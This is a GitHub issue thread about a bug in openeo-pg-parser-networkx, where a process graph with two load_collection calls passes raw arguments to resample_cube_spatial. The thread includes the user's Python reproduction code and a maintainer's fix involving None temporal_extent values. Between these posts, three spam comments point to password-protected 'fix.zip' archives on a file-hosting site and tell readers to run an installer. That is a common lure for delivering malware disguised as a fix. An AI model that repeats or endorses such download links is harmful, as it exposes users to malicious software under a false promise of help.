### ISSUE TITLE
In a graph with two load_collection, the second load_collection is not called so process gets raw load_collection arguments.

### ISSUE THREAD

**Issue by danielFlemstrom** [Open-EO/openeo-pg-parser-networkx#89]
I was writing an example where we load two bands of different resolution and then resample one of them and finally concat them into one cube. 

![image](https://github.com/user-attachments/assets/a7fa9a96-136e-44fc-8c59-3d647c6e3c99)

When i stop in the `resample_cube_spatial` process, i get the arguments to load_collection instead of the loaded collection itself. I would guess the problem lies in the conversion from tree to callable graph rather than the resample process.

I execute the graph as:
 ```python
parsed_graph = OpenEOProcessGraph.from_json(pg_text)
callable_graph = parsed_graph.to_callable(process_registry)
res = callable_graph()
```

The notebook code to reproduce the potential error is here:
```python
import openeo
import xarray as xr
import matplotlib.pyplot as plt

# Connect to OpenEO
#conn = openeo.connect(eo_service_url)
conn = openeo.connect("http://host.docker.internal:8000")

# Authenticate (replace with your credentials or use OAuth if available)
conn.authenticate_basic(username=user, password=passwd)

# Define the collection and bands to load
collection = s2.s2_msi_l2a
band_10m = "b04"  # Red band, 10m resolution
band_20m = "b11"  # SWIR band, 20m resolution

# Define a bounding box for the area of interest
bbox = {"west": 16.0, "south": 59.0, "east": 17.0, "north": 60.0}

# Load the data for both bands
datacube_10m = conn.load_collection(collection, bands=[band_10m], spatial_extent=bbox)
datacube_20m = conn.load_collection(collection, bands=[band_20m], spatial_extent=bbox)

# Resample the 20m datacube to 10m resolution
resampled_20m = datacube_20m.resample_cube_spatial(target=datacube_10m, method="bilinear")

# Merge the datacubes into a single multi-band cube
multi_band_cube = datacube_10m.merge_cubes(resampled_20m)

result = multi_band_cube.execute()

``` 

And in the back:end it ends up like this
![image](https://github.com/user-attachments/assets/43a427b8-8aae-4de5-92df-98f74e2ad526)

Is there something I forgot to do when parsing the tree or is there something that needs to be addressed in this library?
All the best
/Daniel

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ValentinaHutter** [comment]
Thanks for pointing this out! The issue is not related to the two `load` calls, but to the fact that both of them have set `temoral_extent` to `n/a`, which the pg parser did not allow. I now updated it to also allow `None` values in the process graph. Please update your pg-parser to version 2024.10.0, then it should resolve as expected!
